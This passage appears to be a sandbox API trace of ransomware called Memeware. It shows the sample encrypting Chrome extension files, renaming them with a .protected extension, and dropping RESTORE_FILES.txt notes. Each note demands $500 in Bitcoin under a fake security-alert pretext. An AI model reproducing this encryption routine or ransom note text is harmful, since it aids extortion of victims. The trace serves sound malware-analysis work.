(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.983] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.983] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.983] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.983] CloseHandle (hObject=0x164) returned 1 [0078.983] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.983] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0078.983] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0078.983] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0078.983] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0078.983] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0078.984] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr") returned 141 [0078.984] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0078.984] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0078.984] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*") returned 143 [0078.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.984] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.984] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.984] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.984] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.984] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.984] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\.") returned 143 [0078.984] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.984] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.984] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.984] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.984] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.984] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.984] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.984] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\..") returned 144 [0078.984] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.984] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.984] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.984] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.984] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.984] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.984] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.984] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.984] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.984] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.985] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.985] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.985] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.986] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.986] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.986] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.986] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.986] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.986] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.987] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.987] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.987] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.987] CloseHandle (hObject=0x168) returned 1 [0078.987] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.protected") returned 165 [0078.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.protected")) returned 1 [0078.987] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.987] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.988] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\RESTORE_FILES.txt") returned 159 [0078.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.988] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.988] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.989] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.989] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.989] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.989] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.989] CloseHandle (hObject=0x164) returned 1 [0078.989] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.989] lstrcmpiW (lpString1="he", lpString2="Windows") returned -1 [0078.989] lstrcmpiW (lpString1="he", lpString2="Program Files") returned -1 [0078.989] lstrcmpiW (lpString1="he", lpString2="Program Files (x86)") returned -1 [0078.989] lstrcmpiW (lpString1="he", lpString2="$Recycle.bin") returned 1 [0078.989] lstrcmpiW (lpString1="he", lpString2="System Volume Information") returned -1 [0078.989] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he") returned 141 [0078.989] lstrcmpW (lpString1="he", lpString2=".") returned 1 [0078.989] lstrcmpW (lpString1="he", lpString2="..") returned 1 [0078.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*") returned 143 [0078.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.989] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.989] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.989] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.989] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.989] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\.") returned 143 [0078.989] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.989] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.990] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.990] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.990] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.990] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.990] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.990] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\..") returned 144 [0078.990] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.990] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.990] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.990] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.990] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.990] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.990] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.990] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.990] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.990] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.990] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.990] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.990] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.990] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.990] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json") returned 155 [0078.990] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.990] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.991] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.991] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.991] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.991] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.991] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.991] CloseHandle (hObject=0x168) returned 1 [0078.992] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.protected") returned 165 [0078.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.protected")) returned 1 [0078.992] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.992] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.992] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\RESTORE_FILES.txt") returned 159 [0078.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.993] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.993] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.993] lstrlenA 